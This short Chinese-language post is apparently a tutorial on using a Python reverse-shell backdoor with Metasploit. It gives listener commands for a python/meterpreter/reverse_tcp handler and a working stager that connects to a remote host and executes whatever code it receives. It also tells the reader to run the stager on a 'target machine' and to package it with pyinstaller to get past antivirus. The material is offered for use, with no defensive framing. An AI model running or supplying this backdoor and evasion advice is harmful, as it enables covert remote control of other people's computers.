Metasploit中的Python后门脚本

Python作为后门的明显优势就是杀毒软件对于python程序在大部分情况下都是放行的

这段代码是Msfvenom生成的python反向shell

在装有msf的机器执行下面的代码进行监听

use  exploit/multi/handler
set payload python/meterpreter/reverse_tcp    
set LHOST x.x.x.x
set LPORT xxxx

在目标机器上执行下列代码,注意修改代码中的地址的端口号

import time, struct, socket
while True:
    try:
        conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        conn.connect(('192.168.56.1', 9999))
        break
    except:
        time.sleep(5)
#end loop
length = struct.unpack('>I', conn.recv(4))[0]
data = conn.recv(length)
while len(data) < length:
    data += conn.recv(length - len(data))
#end loop
exec(data, {'s': conn})

除了直接执行外,也可以使用pyinstller打包为exe程序执行,在一定情况下也具有免杀效果


服务器资源由ZeptoVM赞助

Partners Wiki Discord